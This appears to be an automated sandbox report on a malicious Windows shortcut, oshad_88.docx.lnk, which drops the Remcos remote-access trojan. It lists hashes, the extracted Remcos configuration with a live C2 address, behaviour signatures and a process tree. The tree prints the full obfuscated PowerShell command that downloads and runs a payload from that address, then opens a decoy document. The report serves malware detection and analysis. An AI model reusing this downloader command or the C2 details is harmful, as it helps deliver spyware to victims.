Analysis
- max time kernel: 149s
- max time network: 143s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 31/08/2024, 01:02
- Static task static1
- Behavioral task behavioral1: sample brt_1_0147.doc.lnk, resource win7-20240704-en
- Behavioral task behavioral2: sample brt_1_0147.doc.lnk, resource win10v2004-20240802-en
- Behavioral task behavioral3: sample oshad_88.docx.lnk, resource win7-20240704-en
- Behavioral task behavioral4: sample oshad_88.docx.lnk, resource win10v2004-20240802-en
- Behavioral task behavioral5: sample rv_luti_2024_roku.xlsx.lnk, resource win7-20240708-en
- Behavioral task behavioral6: sample rv_luti_2024_roku.xlsx.lnk, resource win10v2004-20240802-en
- Behavioral task behavioral7: sample telegrama_ksv_po_btgr.jpg.lnk, resource win7-20240729-en
General
- Target: oshad_88.docx.lnk
- Size: 15KB
- MD5: b8fb0340c7a12ae9d4a3847ac14308cb
- SHA1: 4675f3d8a12942068e609fd2f12f2f020fe5762e
- SHA256: a2bfa5db078137d391b392758fca56b34c8d3c9b0a7e23b1ba9fa9a2edf91000
- SHA512: d9504ca3211e14412ba697d43983e21d100143c5a68be1799e74a704ac76ee6dc999aef09bcd10fb87b9b975bd8184815b6fc2e90ebd96e4f737244a6546d6b0
- SSDEEP: 48:88muavUQSEfFy63YMEDo/atNixCyQvGDDo/DBdCZZGXu/dZZIa7x:88y8GFy63hXEIxCyQ/zuqQ
Malware Config
Extracted: remcos
- feetfuck
- 83.222.191.201:24251
- audio_folder: MicRecords
- audio_record_time: 5
- connect_delay: 0
- connect_interval: 1
- copy_file: remcos.exe
- copy_folder: Remcos
- delete_file: false
- hide_file: false
- hide_keylog_file: false
- install_flag: false
- keylog_crypt: false
- keylog_file: logs.dat
- keylog_flag: false
- keylog_folder: remcos
- mouse_option: false
- mutex: Rmc-XTJ1YO
- screenshot_crypt: false
- screenshot_flag: false
- screenshot_folder: Screenshots
- screenshot_path: %AppData%
- screenshot_time: 10
- take_screenshot_option: false
- take_screenshot_time: 5
Signatures
- Blocklisted process makes network request (1 IoC)
  flow 5, pid 404, powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation (cmd.exe)
- Executes dropped EXE (2 IoCs)
  pid 5068 Newfts.exe; pid 4972 Newfts.exe
- Loads dropped DLL (8 IoCs)
  pid 5068 Newfts.exe (4 times); pid 4972 Newfts.exe (4 times)
- Suspicious use of SetThreadContext (1 IoC)
  PID 4972 set thread context of 4568 (4972 Newfts.exe, procid_target 99)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 4 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (Newfts.exe, twice; cmd.exe; explorer.exe)
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (WINWORD.EXE)
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (WINWORD.EXE)
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (WINWORD.EXE)
- Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings (powershell.exe)
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  pid 3812 WINWORD.EXE (twice)
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid 404 powershell.exe (twice); pid 5068 Newfts.exe; pid 4972 Newfts.exe (twice); pid 4568 cmd.exe (twice)
- Suspicious behavior: MapViewOfSection (2 IoCs)
  pid 4972 Newfts.exe; pid 4568 cmd.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, pid 404 powershell.exe
- Suspicious use of SetWindowsHookEx (10 IoCs)
  pid 3812 WINWORD.EXE (10 times)
- Suspicious use of WriteProcessMemory (19 IoCs)
  PID 2992 (cmd.exe) wrote to memory of 404, procid_target 85 (2 times)
  PID 404 (powershell.exe) wrote to memory of 5068, procid_target 96 (3 times)
  PID 404 (powershell.exe) wrote to memory of 3812, procid_target 97 (2 times)
  PID 5068 (Newfts.exe) wrote to memory of 4972, procid_target 98 (3 times)
  PID 4972 (Newfts.exe) wrote to memory of 4568, procid_target 99 (4 times)
  PID 4568 (cmd.exe) wrote to memory of 624, procid_target 107 (5 times)
Processes
1. C:\Windows\system32\cmd.exe (PID 2992)
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\oshad_88.docx.lnk
   Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 404)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo sviYiTDifmVgwUmQzFgOPYIV; echo JzJdBqRYxLImYrcCLbpdqvjXsIJfpWlZfWY; echo ZKgorOmcNJZZMbukHvugkdfvZrLIe; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo SRChLBIQjesWVTeXbGypCUPpLnWGEpbzmlAuNYge; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo tAtLAczHKJaDGfRcGQexTEXSHDzsHxFvifZtnswW; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/oshad_88.docx -OutFile oshad_88.docx; echo SQwXgOGQnSfQxMfeOlQMGbil; s''t''a''rt oshad_88.docx
      Signatures: Blocklisted process makes network request; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      3. C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe (PID 5068)
         Command line: "C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"
         Signatures: Executes dropped EXE; Loads dropped DLL; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
         4. C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe (PID 4972)
            Command line: C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe
            Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory
            5. C:\Windows\SysWOW64\cmd.exe (PID 4568)
               Command line: C:\Windows\SysWOW64\cmd.exe
               Signatures: System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory
               6. C:\Windows\SysWOW64\explorer.exe (PID 624)
                  Command line: C:\Windows\SysWOW64\explorer.exe
                  Signatures: System Location Discovery: System Language Discovery
      3. C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (PID 3812)
         Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\oshad_88.docx" /o ""
         Signatures: Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads